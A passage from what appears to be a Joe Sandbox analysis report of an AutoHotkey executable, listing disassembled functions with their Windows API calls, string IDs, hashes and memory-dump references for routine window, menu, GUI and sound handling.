                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __fassign$_wcschr
                                      • String ID: Analog$Aux$Digital$Headphones$Line$Master$Microphone$N/A$PCSpeaker$Speakers$Synth$Telephone$Wave
                                      • API String ID: 3927346847-2477456585
                                      • Opcode ID: a1fe2fd4cb796b0673fa9f8544ae4506ef856ac12d90f2f95bfada7f35fa418c
                                      • Instruction ID: aa5a872951048ea90b050b60ce2e26a4688f2cc09e12909a769d4222be85e723
                                      • Opcode Fuzzy Hash: a1fe2fd4cb796b0673fa9f8544ae4506ef856ac12d90f2f95bfada7f35fa418c
                                      • Instruction Fuzzy Hash: 7D51517262412512DE11212D7C517FE218D8B9637AF28872BFC29DA3C2FB8DC89552E9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040F190 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: AltTab$AltTabAndMenu$AltTabMenu$AltTabMenuDismiss$Off$ShiftAltTab$Toggle
                                      • API String ID: 3832890014-1651597821
                                      • Opcode ID: 3620851c642f36e8e648e10881c782b536c30ee3b2031b81cbad254b3452dfb3
                                      • Instruction ID: 2576fd34ddc42ab7dde69c74f4f45c0cbe731a0e7ed7668bbe4f1780f05831f0
                                      • Opcode Fuzzy Hash: 3620851c642f36e8e648e10881c782b536c30ee3b2031b81cbad254b3452dfb3
                                      • Instruction Fuzzy Hash: 67112E49A4521131EF35253A5D0379B24845F6170BF8844BFFC04E57C1FAAEEF4A81AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044B600 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 184windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __wcstoi64.LIBCMT ref: 0044B63B
                                      • MessageBeep.USER32(00000000), ref: 0044B653
                                        • Part of subcall function 0049A0D8: __wcstoi64.LIBCMT ref: 0049A0E4
                                      • mciSendStringW.WINMM(status AHK_PlayMe mode,?,00000208,00000000), ref: 0044B68B
                                      • mciSendStringW.WINMM(close AHK_PlayMe,00000000,00000000,00000000), ref: 0044B6A0
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044B6C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: SendString$__wcstoi64$BeepMessage
                                      • String ID: close AHK_PlayMe$open "%s" alias AHK_PlayMe$play AHK_PlayMe$status AHK_PlayMe mode$stopped
                                      • API String ID: 315599926-4077410995
                                      • Opcode ID: 27a63d1b53d758206285dc3d9b611c83b4934bb02263b536c261b61f13925b47
                                      • Instruction ID: 59d5c7ec44a886ae2712c408083f39863d7cc846f3062e3f8349aaf6f898718d
                                      • Opcode Fuzzy Hash: 27a63d1b53d758206285dc3d9b611c83b4934bb02263b536c261b61f13925b47
                                      • Instruction Fuzzy Hash: F351297278030461F620A6259C43FF77354DBA1B65F24053BF704AA2D1DB9EE58982FE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C060 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Enabled$Focus$FocusV$Hwnd$Name$Pos$Visible
                                      • API String ID: 3832890014-542124868
                                      • Opcode ID: f85ed2e560ccb2f56fced4bad1314ee78a65f6d56962c0ff858f2c68111d232c
                                      • Instruction ID: 01d85473d456e57c7918497a62c633a23576e9d106b826eb8eb4a13ab989069b
                                      • Opcode Fuzzy Hash: f85ed2e560ccb2f56fced4bad1314ee78a65f6d56962c0ff858f2c68111d232c
                                      • Instruction Fuzzy Hash: 2E017889A80A11E2EF10226D8D03BCF68885B60B1BFC4487BF914D5281F38ECA54C0BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045C7E0 Relevance: 24.3, APIs: 16, Instructions: 258windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • __wcsicoll.LIBCMT ref: 0045C86A
                                      • GetSystemMenu.USER32(00000000,00000000), ref: 0045C878
                                      • GetMenu.USER32(00000000), ref: 0045C894
                                      • GetMenuItemCount.USER32(00000000), ref: 0045C8A9
                                      • __fassign.LIBCMT ref: 0045C929
                                      • GetMenuItemID.USER32(?,?), ref: 0045C950
                                      • GetSubMenu.USER32(?,?), ref: 0045C95F
                                      • GetMenuItemCount.USER32(00000000), ref: 0045C96A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountWindow$ForegroundSystemVisible__fassign__wcsicoll
                                      • String ID:
                                      • API String ID: 3951159358-0
                                      • Opcode ID: 44b8760cf8ff8381df9734d64a23794585f900f67c7e493032aab6d14e716bf1
                                      • Instruction ID: 86e9be6bc2e8eaebde4f0cedb696fb5cea08acb95270ddc95ff82748ccaf6897
                                      • Opcode Fuzzy Hash: 44b8760cf8ff8381df9734d64a23794585f900f67c7e493032aab6d14e716bf1
                                      • Instruction Fuzzy Hash: DF91E3B16043059FC720DF64DC84B5BBBE4EB89715F04492EFD8697282D778AD08CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004820A0 Relevance: 24.1, APIs: 16, Instructions: 110windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 004820BC
                                      • CreateCompatibleDC.GDI32(00000000), ref: 004820C9
                                      • GetIconInfo.USER32(?,?), ref: 004820DF
                                      • GetObjectW.GDI32(?,00000018,?), ref: 004820F9
                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00482112
                                      • SelectObject.GDI32(00000000,00000000), ref: 00482120
                                      • CreateSolidBrush.GDI32(FF000000), ref: 0048214B
                                      • FillRect.USER32(00000000,?,00000000), ref: 0048215A
                                      • DeleteObject.GDI32(00000000), ref: 00482161
                                      • DrawIconEx.USER32(00000000,00000000,00000000,?,?,?,00000000,00000000,00000003), ref: 00482181
                                      • SelectObject.GDI32(00000000,00000000), ref: 00482189
                                      • DeleteObject.GDI32(?), ref: 0048219E
                                      • DeleteObject.GDI32(?), ref: 004821A5
                                      • DeleteDC.GDI32(00000000), ref: 004821AC
                                      • ReleaseDC.USER32(00000000,00000000), ref: 004821B5
                                      • DestroyIcon.USER32(?,?,75295780), ref: 004821BC
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Object$Delete$CreateIcon$CompatibleSelect$BitmapBrushDestroyDrawFillInfoRectReleaseSolid
                                      • String ID:
                                      • API String ID: 2104539931-0
                                      • Opcode ID: 23d307c64439930c1ea582c87dd4ea36c43cd03b7ca3da87f05f77aa01f95ba9
                                      • Instruction ID: 0e050c2c27b98afd45818391a1081fd21f392f5c48182c7ac616169faae95ae2
                                      • Opcode Fuzzy Hash: 23d307c64439930c1ea582c87dd4ea36c43cd03b7ca3da87f05f77aa01f95ba9
                                      • Instruction Fuzzy Hash: F7316271608300AFD3009F64DC88E6FBBF8EB8A705F504929FA4682250DB74DD058B6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042D420 Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 410COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll_memmove$_wcsncpy
                                      • String ID: "$ErrorLevel$Illegal parameter name.$Out of memory.$Variable name too long.
                                      • API String ID: 3055118137-3900197193
                                      • Opcode ID: c688eb51930ecc157e41a313c9c3f02277e4adaa2edb498bb05281aa5c2edab1
                                      • Instruction ID: 62f2ab278ba812e8b1e00cf376728a7d66e8ca256b575216bfa43a473c789b10
                                      • Opcode Fuzzy Hash: c688eb51930ecc157e41a313c9c3f02277e4adaa2edb498bb05281aa5c2edab1
                                      • Instruction Fuzzy Hash: 32E1F475A043158FD720DF18E884AABB3E0FF98318F54466EE88487351D739ED45CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004692E0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 254COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$_wcsncpy
                                      • String ID: %sGui$Close$ContextMenu$DropFiles$Escape$Size
                                      • API String ID: 1630244902-459179435
                                      • Opcode ID: 6c8b669a4cf9f6029a7de1300a9f8d20cc7bbaca72cf777a2e42330d7500d1ca
                                      • Instruction ID: 79b713c29b83cc6e6738679a1b91edd8b1da29a349eac7874f2905f20a31e913
                                      • Opcode Fuzzy Hash: 6c8b669a4cf9f6029a7de1300a9f8d20cc7bbaca72cf777a2e42330d7500d1ca
                                      • Instruction Fuzzy Hash: 9081C672A04311ABCB309A25890176773ACDF44B54F09852FEC469B390F7B8DD44C7AB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045D0D0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 133windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000020), ref: 0045D0DC
                                      • SendMessageTimeoutW.USER32(?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045D11E
                                      • GetParent.USER32 ref: 0045D134
                                      • SetLastError.KERNEL32(00000000,?,?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045D146
                                      • GetDlgCtrlID.USER32 ref: 0045D14D
                                      • GetLastError.KERNEL32(?,?,?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045D159
                                      • SendMessageTimeoutW.USER32(00000000,00000111,?,?,00000002,000007D0,000000FF), ref: 0045D186
                                      • SendMessageTimeoutW.USER32(00000000,00000111,00000002,?,00000002,000007D0,000000FF), ref: 0045D1AE
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045D1D4
                                      • SendMessageTimeoutW.USER32(?,0000018F,000000FF,?,00000002,000007D0,?), ref: 0045D219
                                      • SendMessageTimeoutW.USER32(?,00000185,00000001,?,00000002,000007D0,?), ref: 0045D23D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSendTimeout$ErrorLast$ClassCtrlLongNameParentWindow
                                      • String ID: Combo$List
                                      • API String ID: 3027087493-1246219895
                                      • Opcode ID: ef129067999bef400f8e05023ce942ed20a4bf264de08b383603054c49b7800a
                                      • Instruction ID: 1002a0c3e8bf59e926bd215a63b685782d33f75976acad839a098172391b1207
                                      • Opcode Fuzzy Hash: ef129067999bef400f8e05023ce942ed20a4bf264de08b383603054c49b7800a
                                      • Instruction Fuzzy Hash: 9841D770E443056AEB309E209C46F7B36A8DF81B15F00432BBE61E51D1DBA8DD09876E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00443510 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 289COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID: %sBottom$%sLeft$%sRight$%sTop$Parameter #2 invalid.$h
                                      • API String ID: 2102423945-3189716140
                                      • Opcode ID: 62bb67ba8cfece099b3783ee2055a4841b46c58e790949c2e800b90c3d7ccb8e
                                      • Instruction ID: 5e59367a2bde35653378ee9dc7d4b08c4ec1fa378b09e9dd043d59967f9f4f98
                                      • Opcode Fuzzy Hash: 62bb67ba8cfece099b3783ee2055a4841b46c58e790949c2e800b90c3d7ccb8e
                                      • Instruction Fuzzy Hash: 8291B8727042006BD210EE1ADC41FABB3E9EBC8B15F10452FF948D7381DA79ED1587AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00474310 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 204windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPropW.USER32(?,ahk_autosize), ref: 00474324
                                      • RemovePropW.USER32(?,ahk_autosize), ref: 0047433F
                                      • GetWindowRect.USER32(?,?), ref: 0047437E
                                      • GetWindowRect.USER32(?,?), ref: 004743BF
                                      • MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 00474400
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0047441C
                                      • SendMessageW.USER32(-00000002,0000132C,00000000,00000000), ref: 00474455
                                      • MoveWindow.USER32(-00000002,?,?,?,?,00000001), ref: 0047447B
                                      • SendMessageW.USER32(?,0000132C,00000000,00000000), ref: 00474499
                                      • SendMessageW.USER32(00000000,0000130A,00000000,?), ref: 004744BD
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,0000132C,00000000,00000000), ref: 0047452B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$MovePropRect$LongPointsRemove
                                      • String ID: ahk_autosize
                                      • API String ID: 2074670510-1503521729
                                      • Opcode ID: 28bbb96a771ac7b2c1b53a417d579e4529955bdc2ae1ede548b6c4d2eda1f5e9
                                      • Instruction ID: 0dc2a9467b1efd1957a04ca1bdc87b88fff03d19751790e13abef286f0d54ef7
                                      • Opcode Fuzzy Hash: 28bbb96a771ac7b2c1b53a417d579e4529955bdc2ae1ede548b6c4d2eda1f5e9
                                      • Instruction Fuzzy Hash: FC814475608301AFC710CF68C984BABBBE5BBC8704F04892EF9899B351D778E945CB56
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045C000 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryW.KERNEL32(advapi32,?,00000000), ref: 0045C014
                                      • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 0045C049
                                      • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 0045C058
                                      • _memset.LIBCMT ref: 0045C08A
                                      • CloseHandle.KERNEL32(?), ref: 0045C130
                                      • GetLastError.KERNEL32 ref: 0045C152
                                      • FreeLibrary.KERNEL32(00000000), ref: 0045C15F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Library$Free$AddressCloseErrorHandleLastLoadProc_memset
                                      • String ID: CreateProcessWithLogonW$CreateProcessWithLogonW.$D$RunAs: Missing advapi32.dll.$advapi32
                                      • API String ID: 3715048715-4276146922
                                      • Opcode ID: e63bbc3262f253f694936329519fee49380352b4e04c3e97fe56c1d4a8cbd1ac
                                      • Instruction ID: 0c49a8820e290968571d2decf6b4e379b08762c088879228e3c1070381f135ab
                                      • Opcode Fuzzy Hash: e63bbc3262f253f694936329519fee49380352b4e04c3e97fe56c1d4a8cbd1ac
                                      • Instruction Fuzzy Hash: 05418F717803019FD7209E698CC0BAB77E8EB85B51F10442AFD41DB381DB79D8088B6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004634A0 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 131COMMON
                                      Download Yara Rule
                                      APIs
                                      • StringFromGUID2.OLE32(-00000014,?,00000028), ref: 004635E6
                                        • Part of subcall function 00463400: _free.LIBCMT ref: 0046348C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: FromString_free
                                      • String ID: DispatchIID$DispatchType$EventSink$IID$IID$Name$Object$Prefix$Value$VarType$object
                                      • API String ID: 3170056605-2444924249
                                      • Opcode ID: f2b3a6fa0764475c99783b8feb7454649b5ba1f27450d87999055e3417577f94
                                      • Instruction ID: dfdaf3971884d6f93db2ad7068facebb3646b936989471ef27e244219beb91f8
                                      • Opcode Fuzzy Hash: f2b3a6fa0764475c99783b8feb7454649b5ba1f27450d87999055e3417577f94
                                      • Instruction Fuzzy Hash: C2416D74604341AFC308DF18C845F2AB7E5BF98705F108A1EF499873A0E7B8EA45CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00460560 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 245COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$String$FreeFrom
                                      • String ID: class$clsid$iid$name
                                      • API String ID: 2668509760-3724380462
                                      • Opcode ID: 67b8acc52ed2975123f794cc20fc8599720baca964bc0db7aaa7bf7647a280a7
                                      • Instruction ID: 31089808e51fb001f5152fd142a90f08d6abbaadf20ff87af51ff87068724f2d
                                      • Opcode Fuzzy Hash: 67b8acc52ed2975123f794cc20fc8599720baca964bc0db7aaa7bf7647a280a7
                                      • Instruction Fuzzy Hash: 1081BCB5600201AFDB10DF19D881B2BB3E4EF84315F14856EF9468B391E739EC15CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045D2FC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 244windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041C620: __wcsicoll.LIBCMT ref: 0041C638
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • SendMessageTimeoutW.USER32(00000000,000000F0,00000000,00000000,00000002,000007D0,?), ref: 0045D388
                                      • IsWindowEnabled.USER32(00000000), ref: 0045D3BC
                                      • IsWindowVisible.USER32(00000000), ref: 0045D3E6
                                      • SendMessageTimeoutW.USER32(00000000,0000130B,00000000,00000000,00000002,000007D0,?), ref: 0045D424
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 0045D45A
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 0045D4B7
                                      • SendMessageTimeoutW.USER32(00000000,00000188,00000000,00000000,00000002,000007D0,?), ref: 0045D51B
                                      • SendMessageTimeoutW.USER32(00000000,0000018A,?,00000000,00000002,000007D0,?), ref: 0045D541
                                      • SendMessageTimeoutW.USER32(00000000,00000189,?,00000000), ref: 0045D59A
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 0045D63F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSendTimeout$Window$ClassName$Visible$EnabledForeground__wcsicoll
                                      • String ID: Combo$SysListView32
                                      • API String ID: 4132077911-871643043
                                      • Opcode ID: 8545957c2536aa354c25947f10f36821f35fdc7a26605fe58a8b6d0b53404981
